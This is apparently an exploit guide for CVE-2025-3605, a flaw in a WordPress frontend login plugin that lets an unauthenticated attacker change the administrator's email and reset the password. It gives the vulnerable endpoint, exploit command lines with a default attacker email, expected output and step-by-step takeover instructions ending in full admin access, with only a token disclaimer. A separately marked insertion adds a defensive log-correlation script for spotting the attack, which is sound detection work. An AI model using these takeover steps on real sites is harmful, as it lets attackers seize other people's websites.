## https://sploitus.com/exploit?id=62F98837-7F50-5EC8-930D-B38C7CE84FD1
# CVE-2025-3605 Exploit Guide
### Vulnerability Summary
The **Frontend Login and Registration Blocks** plugin for WordPress (versions <= 1.0.7) is vulnerable to **privilege escalation via account takeover**.
The issue arises because the plugin does **not validate user identity** when updating sensitive details like email through the `flr_blocks_user_settings_handle_ajax_callback()` function.
**Impact:**
An unauthenticated attacker can change the administrator's email, trigger the "Forgot Password" process, and reset the admin password, gaining full control.
---
### Proof of Concept (PoC)
The included Python script automates the exploitation process by targeting the vulnerable AJAX endpoint:
```
/wp-admin/admin-ajax.php
```
It updates the email of the targeted user (typically user_id `1` for admin) to an attacker-controlled email.
---
### Included Script
**Filename:** `CVE-2025-3605.py`
```
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail attacker@example.com
```
**Default values:**
- `--user_id`: 1 (default admin)
- `--mail`: gadalubau1337@gmail.com
---
### Usage & Help
To see the help menu, run:
```
python CVE-2025-3605.py --help
```
Output:
```
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By GadaLuBau (GadaLuBau1337)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: gadalubau1337@gmail.com)
```
Example run:
```
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail attacker@example.com
```
---
### Expected Output
On success:
```
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : GadaLuBau ( GadaLuBau1337 )
```
On failure:
```
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
```
---
### After Exploitation
1. Navigate to:
```
http://target-site/wordpress/wp-login.php
```
2. Enter the **new email** you set (`attacker@example.com`).
3. Request a password reset.
4. Set a new password.
5. Log in as **administrator** and enjoy full access.
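
For defenders, the chain described in the summary and in the steps above (a successful POST to `/wp-admin/admin-ajax.php` followed by a password-reset request) can be hunted for in web server logs. The following is an added example, not part of the original guide or its script; it assumes combined-format access logs, a 15-minute correlation window, and uses constructed sample lines and hypothetical function names.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2025:10:00:01 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 74 "-" "python-requests/2.31"
203.0.113.7 - - [12/May/2025:10:00:40 +0000] "POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2025:10:05:00 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 31 "https://example.test/wordpress/" "Mozilla/5.0"
198.51.100.9 - - [12/May/2025:11:30:00 +0000] "GET /wordpress/wp-login.php?action=lostpassword HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
192.0.2.50 - - [12/May/2025:10:06:00 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 400 1 "-" "curl/8.0"
192.0.2.50 - - [12/May/2025:10:06:30 +0000] "POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1" 302 0 "-" "curl/8.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse(line):
    """Return (ip, time, method, path, status) or None for unparseable lines."""
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def find_takeover_chains(log_text, window=timedelta(minutes=15)):
    """Return (ip, ajax_time, reset_time) where a 200 POST to admin-ajax.php is
    followed by a lost-password POST from the same client within `window`."""
    last_ajax = {}  # ip -> time of most recent successful admin-ajax POST
    hits = []
    for ip, when, method, path, status in filter(None, map(parse, log_text.splitlines())):
        if method != "POST":
            continue
        if path.split("?")[0].endswith("/wp-admin/admin-ajax.php"):
            if status == 200:  # the guide shows HTTP 400 for a failed attempt
                last_ajax[ip] = when
        elif "/wp-login.php" in path and "action=lostpassword" in path:
            start = last_ajax.get(ip)
            if start and timedelta(0) <= when - start <= window:
                hits.append((ip, start, when))
    return hits

if __name__ == "__main__":
    for ip, a, r in find_takeover_chains(SAMPLE_LOG):
        print(f"{ip}: admin-ajax POST {a:%H:%M:%S}, reset requested {r:%H:%M:%S}")
```

`admin-ajax.php` carries a lot of legitimate traffic, so treat a hit as a triage lead and confirm it against the affected account's current email address and any recent password-reset mail.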
---
### Disclaimer
This exploit and script are provided **for educational and authorized testing purposes only**.
Any unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
---
*By: GadaLuBau (GadaLuBau1337)*